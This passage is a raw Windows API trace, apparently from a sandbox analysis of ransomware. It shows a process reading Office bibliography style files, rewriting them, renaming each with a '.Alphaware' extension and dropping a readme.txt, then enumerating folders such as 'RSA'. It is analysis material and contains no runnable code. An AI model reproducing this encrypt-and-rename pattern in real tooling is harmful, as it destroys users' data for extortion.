"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl.alphaware")) returned 1 [0092.222] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl", dwFileAttributes=0x80) returned 1 [0092.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.223] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23cd110 | out: lpFileInformation=0x23cd110*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f629790, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3)) returned 1 [0092.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.223] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.223] ReadFile (in: hFile=0x250, lpBuffer=0x126ce7f8, nNumberOfBytesToRead=0x3e4f3, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x126ce7f8*, lpNumberOfBytesRead=0x23e958*=0x3e4f3, lpOverlapped=0x0) returned 1 [0092.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.249] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x892f63a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x53220)) returned 1 [0092.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.260] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl.alphaware")) returned 1 [0092.267] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL", dwFileAttributes=0x80) returned 1 [0092.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), fInfoLevelId=0x0, lpFileInformation=0x248a050 | out: lpFileInformation=0x248a050*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ff88e30, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8)) returned 1 [0092.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.268] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.268] ReadFile (in: hFile=0x250, lpBuffer=0x12af7990, nNumberOfBytesToRead=0x3d5c8, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x12af7990*, lpNumberOfBytesRead=0x23e958*=0x3d5c8, lpOverlapped=0x0) returned 1 [0092.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x893dabe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x51de0)) returned 1 [0092.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.354] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl.alphaware")) returned 1 [0092.355] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL", dwFileAttributes=0x80) returned 1 [0092.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23cbd20 | out: lpFileInformation=0x23cbd20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x70497cf0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x54256)) returned 1 [0092.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.359] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.359] ReadFile (in: hFile=0x250, lpBuffer=0x128bafc8, nNumberOfBytesToRead=0x54256, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x128bafc8*, lpNumberOfBytesRead=0x23e958*=0x54256, lpOverlapped=0x0) returned 1 [0092.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.397] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0092.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0092.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89473160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x703f4)) returned 1 [0092.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0092.412] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl.alphaware")) returned 1 [0092.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x89473160, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89473160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88e7fa60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6ca60, dwReserved0=0x0, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl.Alphaware", cAlternateFileName="APASIX~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88f17fe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x60bc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHICAGO.XSL.Alphaware", cAlternateFileName="CHICAG~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x88f8a400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x57820, dwReserved0=0x0, dwReserved1=0x0, cFileName="GB.XSL.Alphaware", cAlternateFileName="GBXSL~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89022980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x53808, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostName.XSL.Alphaware", cAlternateFileName="GOSTNA~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8906ec40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x51e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostTitle.XSL.Alphaware", cAlternateFileName="GOSTTI~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x891071c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5cc34, dwReserved0=0x0, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl.Alphaware", cAlternateFileName="HARVAR~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x8919f740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5fec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl.Alphaware", cAlternateFileName="IEEE20~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89211b60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x58274, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690.XSL.Alphaware", cAlternateFileName="ISO690~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x892aa0e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x46e08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL.Alphaware", cAlternateFileName="ISO690~2.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x892f63a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x53220, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl.Alphaware", cAlternateFileName="MLASEV~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88e7fa60, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x88e7fa60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x88e7fa60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x893dabe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x51de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIST02.XSL.Alphaware", cAlternateFileName="SIST02~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89473160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x703f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL.Alphaware", cAlternateFileName="TURABI~1.ALP")) returned 1 [0092.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89473160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x703f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL.Alphaware", cAlternateFileName="TURABI~1.ALP")) returned 0 [0092.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0092.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0092.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0092.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 